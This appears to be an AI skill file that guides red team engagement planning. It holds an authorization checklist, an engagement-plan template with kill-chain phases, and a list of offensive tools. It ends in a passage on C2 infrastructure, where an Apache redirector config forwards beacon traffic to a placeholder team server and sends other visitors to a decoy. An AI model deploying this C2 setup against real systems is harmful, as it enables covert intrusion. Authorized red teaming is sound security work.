Red Team Operations & Engagement Planning

# Red Team Operations & Engagement Planning

## Purpose

Enable Claude to assist authorized red team operators with engagement planning, C2 infrastructure design, attack methodology guidance, lateral movement strategy, OPSEC planning, and comprehensive reporting. Every workflow requires confirmed written authorization.

> **CRITICAL — AUTHORIZATION GATE**: Red team assistance requires explicit authorization confirmation before proceeding. Claude will ask for authorization context and will not assist with active attack planning without it.
>
> **Authorized contexts:**
> - Signed Statement of Work (SOW) or Rules of Engagement (ROE)
> - Bug bounty program (confirm target is in-scope)
> - Internal security testing (confirm organizational authority)
> - CTF competition (confirm challenge platform and scope)
> - Research in owned/isolated lab environment

---

## Activation Triggers

This skill activates when the user asks about:
- Planning a red team engagement or adversary simulation
- Designing C2 infrastructure (redirectors, team servers, C2 profiles)
- Active Directory attack paths (BloodHound, Kerberoasting, DCSync)
- Lateral movement techniques for authorized engagements
- Persistence mechanisms in red team context
- Social engineering campaign planning (authorized)
- Red team reporting and executive presentations
- Tabletop exercises (TTX) design
- Purple team collaboration
- OPSEC planning for authorized operations

---

## Prerequisites

```bash
pip install pyyaml requests
```

**Tools for authorized operations:**
- `Cobalt Strike / Sliver / Havoc` — C2 frameworks
- `Metasploit` — Exploitation framework
- `BloodHound / SharpHound` — AD attack path analysis
- `Impacket` — Network protocol tools
- `CrackMapExec / NetExec` — AD enumeration
- `Responder` — LLMNR/NBT-NS poisoning
- `Mimikatz` — Credential access (Windows)

---

## Authorization Verification

**Before any operational planning, Claude asks:**

```
Red team assistance requires authorization confirmation:

1. What is the engagement type?
   □ External penetration test
   □ Internal network assessment
   □ Red team / adversary simulation
   □ Social engineering assessment
   □ Physical security assessment
   □ CTF competition

2. What is your authorization basis?
   □ Signed SOW / contract with target organization
   □ Internal role (IT/Security team testing own systems)
   □ Bug bounty — [program name]
   □ CTF — [platform and challenge name]

3. What is the defined scope?
   (IP ranges, domains, systems, excluded assets)

4. Who is the target organization's security point of contact?
   (For deconfliction — required for IR-level engagements)

Confirm before proceeding. Operational assistance without confirmed
authorization cannot be provided.
```

---

## Core Capabilities

### 1. Engagement Planning

**When the user asks to plan a red team engagement:**

**Engagement Planning Framework:**

```markdown
# Red Team Engagement Plan
**Client:** [Organization Name]
**Engagement Type:** [Full Red Team / CRTO / APT Simulation]
**Start Date:** [Date]
**End Date:** [Date]
**Rules of Engagement Version:** 1.0

## Objectives
- Primary: [e.g., Test detection and response capabilities against APT29 TTPs]
- Secondary: [e.g., Identify privilege escalation paths to Domain Admin]
- Out of Scope: [e.g., Production databases, payment systems, physical access]

## Threat Profile
**Simulating:** [APT29 / FIN7 / LockBit / Custom adversary profile]
**Initial Access Vector:** [Spearphishing / Supply chain / Watering hole]
**Primary Goal:** [Data exfiltration / Ransomware simulation / Domain takeover]

## Attack Kill Chain Phases
1. Reconnaissance → OSINT, subdomain enum (Skill 01)
2. Initial Access → Phishing / external vuln exploitation
3. Execution → PowerShell / LOLBins / custom implant
4. Persistence → Registry / service / scheduled task
5. Privilege Escalation → Local privesc → Domain Admin
6. Defense Evasion → Process injection / AMSI bypass
7. Credential Access → LSASS / Kerberoasting / DCSync
8. Lateral Movement → PSExec / WMI / RDP
9. Collection → Identify critical data
10. Exfiltration → Staged transfer to simulated C2

## Rules of Engagement
- Testing hours: [24x7 / Business hours only / Agreed windows]
- Destructive testing: [Prohibited / Limited / Authorized]
- DoS testing: [Prohibited]
- Social engineering: [Authorized / Prohibited / Phishing only]
- Physical access: [Prohibited / Badge cloning only]
- Deconfliction: Call [POC Name] at [Phone] if critical systems impacted

## Emergency Abort Procedure
If critical systems are impacted unexpectedly:
1. Immediately cease all operations
2. Call [POC] at [Phone] — available 24/7
3. Document what was done and when
4. Stand down until authorized to resume
```

**Engagement Planning Script:**
```bash
python scripts/engagement_planner.py --scope scope.json --output plan.md
```

### 2. C2 Infrastructure Design

**When the user asks about C2 infrastructure for authorized operations:**

**Multi-Tier C2 Architecture:**

```
[Team Server] ← (internal/VPN only) → [Redirector 1 (HTTPS)] ← → [Beacon]
                                    → [Redirector 2 (DNS)]   ← → [Beacon]
                                    → [Backup Redirector]
```

**Infrastructure Components:**

1. **Team Server** — Never directly exposed to internet; VPN access only
2. **Redirectors** — Cloud VPS instances (AWS/Azure/GCP) that proxy C2 traffic
3. **C2 Channels** — HTTPS (primary), DNS (backup), WebSocket (evasive)
4. **Domain Selection** — Aged domains, categorized (business/tech), valid cert

**Redirector Setup (Apache mod_rewrite):**
```apache
# Redirect only Cobalt Strike beacon traffic to team server
# Everything else → sends to legitimate domain (blend in)
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} "Mozilla/5.0 \(Windows NT 6.1; WOW64\) AppleWebKit.*"
RewriteCond %{REQUEST_URI} "^/jquery-3\.3\.1\.min\.js$"
RewriteRule ^(.*)$ http://TEAMSERVER_IP/$1 [P,L]
RewriteRule ^(.*)$ https://microsoft.com/ [R=302,L]  # Decoy redi